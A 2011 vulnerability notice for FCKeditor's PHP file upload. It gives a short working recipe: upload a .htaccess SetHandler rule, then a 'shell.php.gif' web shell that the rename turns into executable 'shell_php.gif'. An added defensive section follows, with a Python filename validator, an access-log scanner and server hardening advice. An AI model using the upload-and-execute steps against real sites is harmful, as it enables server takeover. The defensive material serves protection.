FCKeditor Upload vulnerability (all PHP versions)
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:

code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is automatically changed to "shell_php.gif".
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available from the server.
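The two things the steps above depend on are that the upload handler stores a client-supplied .htaccess, and that its sanitizer turns "shell.php.gif" into "shell_php.gif", a name that still contains the "php" token the uploaded SetHandler rule is keyed on. The following is an added defensive example, not code from the original page or from sinesafe: an upload-side filename check that rejects both patterns and stores files under a random server-chosen name, plus a routine that scans Apache access-log lines for requests into the upload tree whose filename is a dotfile or carries a PHP-like token. The extension allow-list, the token list, the combined log format and the /userfiles/ upload prefix are assumptions; the log lines are constructed samples.

```python
import re
import secrets
from urllib.parse import urlsplit

# Assumed allow-list for an image-upload endpoint (lower case).
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Tokens that must not appear anywhere in a stored name: a handler rule such as
# SetHandler keyed on "_php.gif" matches on a substring of the name, not only on
# the last extension, so checking the final extension alone is not enough.
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def executable_token(name):
    """Return the first PHP-like token in name, splitting on '.', '_' and '-',
    so shell.php.gif and shell_php.gif are both flagged; None if clean."""
    for tok in re.split(r"[._-]+", name.lower()):
        if tok in EXECUTABLE_TOKENS:
            return tok
    return None


def check_upload_name(filename):
    """Validate a client-supplied filename. Returns (accepted, reason)."""
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "empty name, path separator or NUL byte"
    if filename.startswith("."):
        return False, "dotfiles (e.g. .htaccess) are rejected"
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not in allow-list"
    tok = executable_token(filename)
    if tok is not None:
        return False, f"executable token '{tok}' in filename"
    return True, "ok"


def stored_name(filename):
    """Name to store the file under: 32 random hex chars plus the validated
    extension. The client name is never reused, so a rename trick that turns
    one disallowed name into another has nothing to work with."""
    accepted, reason = check_upload_name(filename)
    if not accepted:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def suspicious_requests(log_lines, upload_prefix="/userfiles/"):
    """Scan Apache combined-format access-log lines and return (client, path)
    for requests under upload_prefix whose last path segment is a dotfile or
    carries a PHP-like token. Paths outside the upload tree are ignored, since
    the application's own .php endpoints legitimately live there."""
    req = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|PUT|HEAD) (\S+) ')
    hits = []
    for line in log_lines:
        m = req.match(line)
        if not m:
            continue
        client, target = m.groups()
        path = urlsplit(target).path
        if not path.startswith(upload_prefix):
            continue
        last = path.rsplit("/", 1)[-1]
        if last.startswith(".") or executable_token(last):
            hits.append((client, path))
    return hits


# Constructed sample log lines (not from the original page).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Oct/2011:07:39:07 +0800] "POST /upload.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Oct/2011:07:39:30 +0800] "GET /userfiles/.htaccess HTTP/1.1" 403 199',
    '203.0.113.5 - - [25/Oct/2011:07:40:01 +0800] "GET /userfiles/shell_php.gif HTTP/1.1" 200 1043',
    '198.51.100.7 - - [25/Oct/2011:07:41:12 +0800] "GET /userfiles/holiday.gif HTTP/1.1" 200 9832',
]

if __name__ == "__main__":
    for n in ("holiday.gif", "shell.php.gif", "shell_php.gif", ".htaccess", "x.php"):
        print(n, check_upload_name(n))
    print(stored_name("holiday.gif"))
    print(suspicious_requests(SAMPLE_LOG))
```

The filename check is defence in depth. The server-side fix that removes the root cause is to serve the upload directory with AllowOverride None, so an uploaded .htaccess is never read, and with no script handler mapped for that directory at all; with that in place a stray "_php.gif" name is inert even if the check is bypassed. Note also that the FilesMatch argument is a regular expression, so "_php.gif" matches any character in place of the dot.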